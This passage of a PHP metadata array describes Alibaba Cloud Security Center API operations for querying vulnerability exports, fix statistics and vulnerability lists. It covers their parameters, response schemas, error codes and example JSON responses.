'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the progress of a vulnerability export task', 'description' => 'A download link is returned when the export task status is success.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulExportInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulExportInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Link\\": \\"http://www.aliyun.com\\",\\n \\"Progress\\": 100,\\n \\"RequestId\\": \\"4C1AE3F3-18FA-4108-BXXX-AFA1A032756C\\",\\n \\"CurrentCount\\": 1,\\n \\"Message\\": \\"success\\",\\n \\"FileName\\": \\"app_20210917\\",\\n \\"TotalCount\\": 10,\\n \\"ExportStatus\\": \\"success\\",\\n \\"Id\\": 14356\\n}","type":"json"}]', ], 'DescribeVulFixStatistics' => [ 'summary' => 'Queries the statistics of vulnerability fixes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'FixTotal' => [ 'description' => 'The total statistics of vulnerability fixes.'."\n", 'type' => 'object', 'properties' => [ 'FixingNum' => ['description' => 'The number of vulnerabilities that are being fixed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'FixedTodayNum' => ['description' => 'The number of vulnerabilities that are fixed on the current day.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'FixedTotalNum' => ['description' => 'The total number of fixed vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '47', 'title' => ''], 'NeedFixNum' => ['description' => 'The number of unfixed vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '62', 'title' => ''], ], 'title' => '', 'example' => '', ], 'FixStat' => [ 'description' => 'An array that consists of the statistics of vulnerability fixes by vulnerability type.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The statistics of a vulnerability fix.'."\n", 'type' => 'object', 'properties' => [ 'FixingNum' => ['description' => 'The number of vulnerabilities that are being fixed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability'."\n" .'* **app**: application vulnerability'."\n" .'* **emg**: urgent vulnerability'."\n", 'type' => 'string', 'example' => 'cve', 'title' => ''], 'FixedTodayNum' => ['description' => 'The number of vulnerabilities that are fixed on the current day.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'FixedTotalNum' => ['description' => 'The total number of fixed vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'NeedFixNum' => ['description' => 'The number of unfixed vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '8', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"FixTotal\\": {\\n \\"FixingNum\\": 22,\\n \\"FixedTodayNum\\": 15,\\n \\"FixedTotalNum\\": 47,\\n \\"NeedFixNum\\": 62\\n },\\n \\"FixStat\\": [\\n {\\n \\"FixingNum\\": 17,\\n \\"Type\\": \\"cve\\",\\n \\"FixedTodayNum\\": 10,\\n \\"FixedTotalNum\\": 22,\\n \\"NeedFixNum\\": 8\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeVulFixStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulFixStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulFixStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeVulList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92248', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Ids', 'in' => 'query', 'schema' => ['description' => 'The IDs of vulnerabilities. You can specify up to 50 IDs. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '282,281,283', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks for the asset affected by the vulnerability. The value can be the private IP address, public IP address, or name of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the IDs of asset groups.'."\n", 'type' => 'string', 'required' => false, 'example' => '9207613', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability.'."\n" .'* **app**: application vulnerability that is detected by using web scanner'."\n" .'* **emg**: urgent vulnerability.'."\n" .'* **sca**: application vulnerability that is detected by using software component analysis'."\n", 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers on which you want to query the vulnerabilities. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUIDs.'."\n", 'type' => 'string', 'required' => false, 'example' => '1587bedb-fdb4-48c4-9330-****', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The alias of the vulnerability.'."\n", 'type' => 'string', 'required' => false, 'example' => 'oval:com.redhat.rhsa:def:20172836', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'required' => false, 'example' => 'RHSA-2019:0230-Important: polkit security update', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'schema' => ['description' => 'The status of the vulnerability. Separate multiple statuses with commas (,). Valid values:'."\n" ."\n" .'- 1: unfixed'."\n" .'- 2: fix failed'."\n" .'- 3: rollback failed'."\n" .'- 4: being fixed'."\n" .'- 5: being rolled back'."\n" .'- 6: being verified'."\n" .'- 7: fixed'."\n" .'- 8: fixed and to be restarted'."\n" .'- 9: rolled back'."\n" .'- 10: ignored'."\n" .'- 11: rolled back and to be restarted'."\n" .'- 12: not found'."\n" .'- 20: expired', 'type' => 'string', 'required' => false, 'example' => '1,2,3', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority to fix the vulnerability. Separate multiple priorities with commas (,). Valid values:'."\n" ."\n" .'* **asap**: high'."\n" .'* **later**: medium'."\n" .'* **nntf**: low'."\n", 'type' => 'string', 'required' => false, 'example' => 'asap,later,nntf', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the vulnerabilities are fixed. Valid values:'."\n" ."\n" .'* **y**: yes'."\n" .'* **n**: no'."\n", 'type' => 'string', 'required' => false, 'example' => 'n', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'AttachTypes', 'in' => 'query', 'schema' => ['description' => 'The additional type of the vulnerabilities. You need to specify this parameter when you query application vulnerabilities. Set the value to **sca**. If you set **Type** to **app**, you must specify this parameter.'."\n" ."\n" .'> If you set this parameter to **sca**, application vulnerabilities and the vulnerabilities that are detected based on software component analysis are queried. If you do not specify this parameter, only application vulnerabilities are queried.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sca', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the asset on which the vulnerability is detected. Valid values:'."\n" ."\n" .'* **k8s**: Kubernetes component.'."\n" .'* **uuid**: server.'."\n" .'* **containerId**: container.'."\n", 'type' => 'string', 'required' => false, 'example' => 'k8s', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c88fb10da1168494091db6aafc5dd****', 'title' => ''], ], [ 'name' => 'VpcInstanceIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the virtual private cloud (VPC) in which the vulnerabilities are detected. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'ins-133****,ins-5414****', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use NextToken to query the data of vulnerabilities. If you set UseNextToken to true, the value of TotalCount is not returned. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The pagination token that is used in the next request to retrieve a new page of results. You must specify the token that is obtained from the previous query as the value of NextToken. You do not need to specify this parameter for the first request.'."\n", 'type' => 'string', 'required' => false, 'example' => 'E17B501887A2D3AA5E8360A6EFA3B***', 'title' => ''], ], [ 'name' => 'RaspDefend', 'in' => 'query', 'schema' => ['description' => 'Indicates whether the application protection feature is supported. Valid values:'."\n" ."\n" .'- **0**: no.'."\n" ."\n" .'- **1**: yes.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '2F26AB2A-1075-488F-8472-40E5DB486ACC', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of vulnerabilities returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'VulRecords' => [ 'description' => 'The information about the vulnerability.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the vulnerability. Valid values:'."\n" ."\n" .'* **1**: unfixed.'."\n" .'* **2**: fix failed.'."\n" .'* **3**: rollback failed.'."\n" .'* **4**: being fixed.'."\n" .'* **5**: being rolled back.'."\n" .'* **6**: being verified.'."\n" .'* **7**: fixed.'."\n" .'* **8**: fixed and to be restarted.'."\n" .'* **9**: rolled back.'."\n" .'* **10**: ignored.'."\n" .'* **11**: rolled back and to be restarted.'."\n" .'* **12**: not found.'."\n" .'* **20**: expired.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RaspDefend' => ['description' => 'Indicates whether the application protection feature is supported. Valid values:'."\n" ."\n" .'* **0**: no.'."\n" .'* **1**: yes.'."\n" ."\n" .'> If this parameter is not returned, the application protection feature is not supported.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RaspStatus' => ['description' => 'The protection mode of the application protection feature. Valid values:'."\n" ."\n" .'* **0**: unprotected.'."\n" .'* **1**: the Monitor mode.'."\n" .'* **2**: the Block mode.'."\n" .'* **3**: disabled.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability.'."\n" .'* **sys**: Windows system vulnerability.'."\n" .'* **cms**: Web-CMS vulnerability.'."\n" .'* **emg**: urgent vulnerability.'."\n" .'* **app**: application vulnerability.'."\n" .'* **sca**: application vulnerability that is detected by using software component analysis.'."\n", 'type' => 'string', 'example' => 'cve', 'title' => ''], 'ModifyTs' => ['description' => 'The timestamp when the vulnerability status was modified. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1620404763000', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the asset.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'PrimaryId' => ['description' => 'The ID of the vulnerability.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '101162078', 'title' => ''], 'Tag' => ['description' => 'The tag that is added to the vulnerability.'."\n", 'type' => 'string', 'example' => 'oval', 'title' => ''], 'K8sClusterId' => ['description' => 'The ID of the cluster.'."\n" ."\n" .'> The value of this parameter is returned only if you use the Ultimate edition of Security Center that can protect container assets.'."\n", 'type' => 'string', 'example' => 'c863dc93bed3843de9934d4346dc4****', 'title' => ''], 'K8sNodeId' => ['description' => 'The ID of the node.'."\n" ."\n" .'> The value of this parameter is returned only if you use the Ultimate edition of Security Center that can protect container assets.'."\n", 'type' => 'string', 'example' => 'i-bp1ifm6suw9mnbsr****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset.'."\n", 'type' => 'string', 'example' => 'testInstance', 'title' => ''], 'Online' => ['description' => 'Indicates whether the Security Center agent on the asset is online. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OsVersion' => ['description' => 'The name of the operating system for your asset.'."\n", 'type' => 'string', 'example' => 'linux', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'example' => 'oval:com.redhat.rhsa:def:20170574', 'title' => ''], 'Progress' => ['description' => 'The progress of the vulnerability fixing.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'ResultCode' => ['description' => 'The code that indicates the vulnerability fixing result.'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the asset.'."\n", 'type' => 'string', 'example' => 'i-bp18t***', 'title' => ''], 'Related' => ['description' => 'The Common Vulnerabilities and Exposures (CVE) IDs related to the vulnerability. Multiple CVE IDs are separated by commas (,).'."\n", 'type' => 'string', 'example' => 'CVE-2017-7518,CVE-2017-12188', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'LastTs' => ['description' => 'The timestamp when the vulnerability was last detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1620404763000', 'title' => ''], 'FirstTs' => ['description' => 'The timestamp when the vulnerability was first detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1554189334000', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the asset.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Necessity' => ['description' => 'The priority to fix the vulnerability. Valid values:'."\n" ."\n" .'* **asap**: high.'."\n" .'* **later**: medium.'."\n" .'* **nntf**: low.'."\n" ."\n" .'> We recommend that you fix **high-risk** vulnerabilities at the earliest opportunity.'."\n", 'type' => 'string', 'example' => 'asap', 'title' => ''], 'RepairTs' => ['description' => 'The timestamp when the vulnerability was fixed. Unit: milliseconds. This parameter is returned only if you fix vulnerabilities in the Security Center console.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1541207563000', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset.'."\n", 'type' => 'string', 'example' => '04c56617-23fc-43a5-ab9b-****', 'title' => ''], 'K8sPodName' => ['description' => 'The name of the pod.'."\n" ."\n" .'> The value of this parameter is returned only if you use the Ultimate edition of Security Center that can protect container assets.'."\n", 'type' => 'string', 'example' => 'deployment-riskai-7b67d68975-m****', 'title' => ''], 'ContainerId' => ['type' => 'string', 'description' => 'The container ID.'."\n", 'example' => '04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****'."\n", 'title' => ''], 'GroupId' => ['description' => 'The ID of the asset group.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '281801', 'title' => ''], 'ResultMessage' => ['description' => 'The message that indicates the vulnerability fixing result.'."\n", 'type' => 'string', 'example' => 'timeout', 'title' => ''], 'K8sNamespace' => ['description' => 'The namespace.'."\n" ."\n" .'> If you use the Ultimate edition of Security Center, the value of this parameter is queried from container assets. If you do not use the Ultimate edition, the value of this parameter is queried from the Security Center agent.'."\n", 'type' => 'string', 'example' => 'default', 'title' => ''], 'AliasName' => ['description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'example' => 'RHSA-2019:0230-Important: polkit security update', 'title' => ''], 'K8sNodeName' => ['description' => 'The name of the node.'."\n" ."\n" .'> The value of this parameter is returned only if you use the Ultimate edition of Security Center that can protect container assets.'."\n", 'type' => 'string', 'example' => 'deployment-riskai-7b67d68975-m****', 'title' => ''], 'ExtendContentJson' => [ 'description' => 'The extended information about the vulnerability.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the vulnerability. Valid values:'."\n" ."\n" .'* **1**: unfixed.'."\n" .'* **2**: fix failed.'."\n" .'* 3: rollback failed.'."\n" .'* **4**: being fixed.'."\n" .'* **5**: being rolled back.'."\n" .'* **6**: being verified.'."\n" .'* **7**: fixed.'."\n" .'* **8**: fixed and to be restarted.'."\n" .'* **9**: rolled back.'."\n" .'* **10**: ignored.'."\n" .'* **11**: rolled back and to be restarted.'."\n" .'* **12**: not found.'."\n" .'* **20**: expired.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'EmgProof' => ['description' => 'The returned message that indicates the urgent vulnerability.'."\n", 'type' => 'string', 'example' => 'com.xxl.rpc.util.XxlRpcException: xxl-rpc request data is empty.\\n\\tat com.xxl.rpc.remoting.net.impl.servlet.serve"', 'title' => ''], 'Ip' => ['description' => 'The public IP address of the asset that is associated with the vulnerability.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'PrimaryId' => ['description' => 'The ID of the vulnerability.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '111', 'title' => ''], 'Os' => ['description' => 'The name of the operating system.'."\n", 'type' => 'string', 'example' => 'centos', 'title' => ''], 'Tag' => ['description' => 'The tag that is added to the vulnerability.'."\n", 'type' => 'string', 'example' => 'oval', 'title' => ''], 'LastTs' => ['description' => 'The timestamp when the vulnerability was last detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1620404763000', 'title' => ''], 'Description' => ['description' => 'The description of the vulnerability.'."\n", 'type' => 'string', 'example' => 'kernel version:5.10.84-10.2.al8.x86_64', 'title' => ''], 'OsRelease' => ['description' => 'The information about the operating system version.'."\n", 'type' => 'string', 'example' => '7', 'title' => ''], 'AliasName' => ['description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'example' => 'RHSA-2019:0230-Important: polkit security update', 'title' => ''], 'Target' => ['description' => 'The URL of the vulnerability.'."\n", 'type' => 'string', 'example' => 'http://39.99.XX.XX:30005/toLogin', 'title' => ''], 'AbsolutePath' => ['description' => 'The path to the package of the software that has the vulnerability.'."\n", 'type' => 'string', 'example' => '/roo/www/web', 'title' => ''], 'RpmEntityList' => [ 'description' => 'The information about RPM Package Manager (RPM) packages.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'FullVersion' => ['description' => 'The complete version number.'."\n", 'type' => 'string', 'example' => '3.10.0-693.2.2.el7', 'title' => ''], 'Version' => ['description' => 'The version number of the package of the software that has the vulnerability.'."\n", 'type' => 'string', 'example' => '3.10.0', 'title' => ''], 'MatchDetail' => ['description' => 'The reason why the vulnerability is detected.'."\n", 'type' => 'string', 'example' => 'python-perf version less than 0:3.10.0-693.21.1.el7', 'title' => ''], 'ImageName' => ['description' => 'The name of the image.'."\n", 'type' => 'string', 'example' => 'registry_387ytb_xxx', 'title' => ''], 'Path' => ['description' => 'The path to the software that has the vulnerability.'."\n", 'type' => 'string', 'example' => '/usr/lib64/python2.7/site-packages', 'title' => ''], 'ContainerName' => ['description' => 'The name of the container.'."\n", 'type' => 'string', 'example' => 'k8s_67895c4_xxx', 'title' => ''], 'Name' => ['description' => 'The name of the RPM package.'."\n", 'type' => 'string', 'example' => 'python-perf', 'title' => ''], 'UpdateCmd' => ['description' => 'The command that is used to fix the vulnerability.'."\n", 'type' => 'string', 'example' => '*** update python-perf', 'title' => ''], 'MatchList' => [ 'description' => 'The rules that are used to detect the vulnerability.'."\n", 'type' => 'array', 'items' => ['description' => 'The rule that is used to detect the vulnerability.'."\n", 'type' => 'string', 'example' => 'fastjson(jar) extendField.safemode equals false', 'title' => ''], 'title' => '', 'example' => '', ], 'Pid' => ['description' => 'The process ID.'."\n", 'type' => 'string', 'example' => '8664', 'title' => ''], 'ExtendField' => ['description' => 'The extended information about the software package that has the vulnerability.'."\n", 'type' => 'string', 'example' => '{"msg_no_lookups_configured_CVE_2021_44228": "false", "jndi_class_not_exist": "false"}', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'cveList' => [ 'description' => 'The CVE list.'."\n", 'type' => 'array', 'items' => ['description' => 'The CVE.'."\n", 'type' => 'string', 'example' => 'CVE-2016-8610', 'title' => ''], 'title' => '', 'example' => '', ], 'Necessity' => [ 'description' => 'Indicates whether the vulnerability needs to be fixed.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the vulnerability priority score. Valid values:'."\n" ."\n" .'* **none**: No score is generated.'."\n" .'* **pending**: The score is pending calculation.'."\n" .'* **normal**: The calculation is normal.'."\n", 'type' => 'string', 'example' => 'normal', 'title' => ''], 'Time_factor' => ['description' => 'The time score.'."\n", 'type' => 'string', 'example' => '1.0', 'title' => ''], 'Enviroment_factor' => ['description' => 'The environment score.'."\n", 'type' => 'string', 'example' => '1.0', 'title' => ''], 'Is_calc' => ['description' => 'Indicates whether the vulnerability priority score is calculated. Valid values:'."\n" ."\n" .'* **0**: no.'."\n" .'* **1**: yes.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'Total_score' => ['description' => 'The vulnerability priority score.'."\n" ."\n" .'The following list describes scores and related fixing suggestions:'."\n" ."\n" .'* If the score is from **13.5 to 15**, the vulnerability is a high-risk vulnerability. You must fix the vulnerability at the earliest opportunity.'."\n" .'* If the score is **greater than or equal to 7 but less than 13.5**, the vulnerability is a medium-risk vulnerability. You can fix the vulnerability at your convenience.'."\n" .'* If the score is **less than 7**, the vulnerability is a low-risk vulnerability. You can ignore the vulnerability.'."\n", 'type' => 'string', 'example' => '7.8', 'title' => ''], 'Cvss_factor' => ['description' => 'The Common Vulnerability Scoring System (CVSS) score.'."\n", 'type' => 'string', 'example' => '7.8', 'title' => ''], 'Assets_factor' => ['description' => 'The asset importance score. Valid values:'."\n" ."\n" .'* **2**: important asset.'."\n" .'* **1**: common asset.'."\n" .'* **0**: test asset.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Bind' => ['description' => 'Indicates whether Security Center is authorized to scan the asset. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OsName' => ['description' => 'The name of the operating system for your asset.'."\n", 'type' => 'string', 'example' => 'CentOS 7.2 64位', 'title' => ''], 'AuthVersion' => ['description' => 'The edition of Security Center that is authorized to scan the asset. Valid values:'."\n" ."\n" .'* **1**: Basic.'."\n" .'* **6**: Anti-virus.'."\n" .'* **5**: Advanced.'."\n" .'* **3**: Enterprise.'."\n" .'* **7**: Ultimate.'."\n" .'* **10**: Value-added Plan.'."\n", 'type' => 'string', 'example' => '3', 'title' => ''], 'RealRisk' => ['description' => 'Indicates whether the vulnerability is easily exploited. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RuleTag' => ['description' => 'The tag of this vulnerability. Valid values:'."\n" ."\n" .'* **AI**: AI-related components.', 'type' => 'string', 'example' => 'AI', 'title' => ''], 'Image' => ['description' => 'The name of the image.', 'type' => 'string', 'example' => 'registry-cn-**-vpc.ack.**.com/acs/ack-node-problem-detector:v0.8.16-8ed7053-**', 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'NextToken' => ['description' => 'The value of NextToken that is returned when the NextToken method is used.'."\n", 'type' => 'string', 'example' => 'E17B501887A2D3AA5E8360A6EFA3B***', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'DataNotExists', 'errorMessage' => '%s data not exist', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ['errorCode' => 'MissingType', 'errorMessage' => 'Type is mandatory for this action.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'DescribeVulList', 'summary' => 'Queries vulnerabilities by type.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulList', 'authLevel' => 'resource', 'actionConditions' => [ ['conditionKey' => 'acs:ResourceGroupId', 'validationType' => 'always'], ], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"2F26AB2A-1075-488F-8472-40E5DB486ACC\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"VulRecords\\": [\\n {\\n \\"Status\\": 1,\\n \\"RaspDefend\\": 1,\\n \\"RaspStatus\\": 1,\\n \\"Type\\": \\"cve\\",\\n \\"ModifyTs\\": 1620404763000,\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"PrimaryId\\": 101162078,\\n \\"Tag\\": \\"oval\\",\\n \\"K8sClusterId\\": \\"c863dc93bed3843de9934d4346dc4****\\",\\n \\"K8sNodeId\\": \\"i-bp1ifm6suw9mnbsr****\\",\\n 